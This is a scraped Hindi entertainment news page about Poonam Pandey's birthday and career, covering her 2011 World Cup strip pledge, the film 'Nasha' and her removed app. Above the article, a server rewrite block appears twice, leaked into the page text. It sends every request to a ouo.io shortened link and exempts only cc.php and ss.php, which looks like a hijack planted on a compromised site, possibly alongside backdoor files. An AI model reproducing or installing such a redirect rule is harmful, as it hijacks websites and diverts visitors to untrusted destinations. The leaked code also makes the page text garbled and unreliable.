
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 506
Previous Nextमुंबई। अपनी बोल्ड तस्वीरों की वजह से सोशल मीडिया सेंसेशन बन चुकीं पूनम पांडेय आज यानी 11 मार्च को अपना बर्थडे सेलिब्रेट कर रही हैं। स्ट्रिप क्वीन ऑफ इंडिया के नाम से मशहूर पूनम पहली बार अपने एक विवादित बयान की वजह से सुर्खियों में आई थीं। पूनम ने इंडियन क्रिकेट टीम को लेकर एक ऐलान किया था।
यह साल 2011 की बात है जब पूनम ने कहा था कि अगर भारत वर्ल्ड कप जीत जाता है तो वह स्ट्रिप करेंगी। उन्होंने इसके लिए BCCI को चिट्ठी भी लिखी थी। लेकिन BCCI ने उनकी इस बात को खारिज कर दिया और ऐसी कोई इजाजत नहीं दी। इसकी कसर उन्होंने कई मौकों पर अपने इंस्टाग्राम अकाउंट के जरिए पूरी की। सोशल मीडिया पर सेक्सी तस्वीरें पोस्ट करने के अलावा पूनम फिल्मों में भी काम कर चुकी हैं। साल 2013 में 'नशा' नाम से आई फिल्म में पूनम टीचर के रोल में नजर आई थीं। अमित सक्सेना निर्देशित फिल्म 'नशा' की कहानी कुछ इस तरह है कि एक टीनएज लड़के को टीचर से प्यार हो जाता है। फिल्म में पूनम ने जमकर बोल्ड सीन दिए थे। लेकिन बावजूद इसके फिल्म बॉक्स-ऑफिस पर औंधे मुंह गिरी थी।
पूनम साउथ में भी अपनी किस्मत आजमा चुकी हैं। इसके अलावा उन्होंने आइटम नंबर भी ट्राय किए लेकिन उन्हें कहीं कोई खास कामयाबी नहीं मिली। लेकिन सुर्खियों में बनी रहने वाली पूनम ने हिम्मत नहीं हारी और अपनी पॉपुलैरिटी के दम पर रियलिटी शो 'खतरों के खिलाड़ी-4' तक पहुंच गईं।
पूनम ने साल 2017 में अपनी एक ऐप लॉन्च की थी। लेकिन गूगल ने कुछ ही घंटों में इसे रिजेक्ट कर दिया और गूगल प्ले स्टोर से हटा लिया। इस ऐप का नाम पांडेय ऐप था।